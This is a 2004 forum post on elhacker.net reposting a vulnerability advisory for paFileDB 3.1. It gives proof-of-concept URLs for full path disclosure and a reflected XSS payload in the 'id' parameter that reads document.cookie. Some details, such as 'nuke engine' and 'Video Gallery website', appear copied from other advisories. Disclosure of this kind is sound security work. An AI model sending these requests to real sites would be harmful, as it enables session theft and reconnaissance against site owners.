elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Personaliza-Escoge el diseño del foro que más te guste.


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Advisory script de descargas paFileDB
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Advisory script de descargas paFileDB  (Leído 1,230 veces)
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 19.347


La libertad no se suplica, se conquista


Ver Perfil WWW
Advisory script de descargas paFileDB
« en: 28 Abril 2004, 06:20 »

#########################################################################
###################### :.: DarkBicho :.: ################################
#                             #
#   PROGRAM: paFileDB                     #
#   VERSION: 3.1                     #
#   URL: http://www.phparena.net               #
#   BUG: Multiple vulnerabilities               #
#   DATE: 27/04/2004                     #
#   AUTHOR: DarkBicho                     #
#           WebSite: http://www.darkbicho.tk            #
#           Email: darkbicho@peru.com               #
#           Team: Security Wari Projects <www.swp-zone.org>      #
#                           #   
#########################################################################
#########################################################################



1.- Vulnerabilities:
    ---------------


A. Full path disclosure:

This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive information.

http://site/includes/admin/login.php?formname=DarkBicho&formpass=DarkBicho
&B1=%3E%3E+Log+In+%3C%3C&action=admin&login=do

and we get standard error messages, revealing the full path to the nuke engine scripting files:

Fatal error: Call to undefined function: locbar() in /home/site/includes/admin/login.php
on line 12

http://localhost/includes/category.php
http://localhost/includes/search.php
http://localhost/includes/main.php
http://localhost/includes/viewall.php
http://localhost/includes/download.php
http://localhost/includes/email.php
http://localhost/includes/file.php
http://localhost/includes/rate.php
http://localhost/includes/stats.php

2. Cross-Site Scripting aka XSS:
   ----------------------------


  Cross-Site Scripting in id variable:


  http://localhost/pafiledb.php?action=category&id='<script>alert(document.cookie);</script>

3.- SOLUTION:
     ¨¨¨¨¨¨¨¨
    Vendors were contacted many weeks hago and plan to release a fixed version soon.
    Check the Video Gallery website for updates and official release details.


4.- Greetings:
    ---------

    greetings to my Peruvian group swp and perunderforce :D
    El pisco es y sera peruano

5.- Contact
    -------

   WEB: http://www.darkbicho.tk
   EMAIL: darkbicho@peru.com
   

---------------------------------- [ EOF ] ------------------------------------
« Última modificación: 28 Abril 2004, 06:24 por el-brujo » En línea

Since 2001, still kicking hard
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines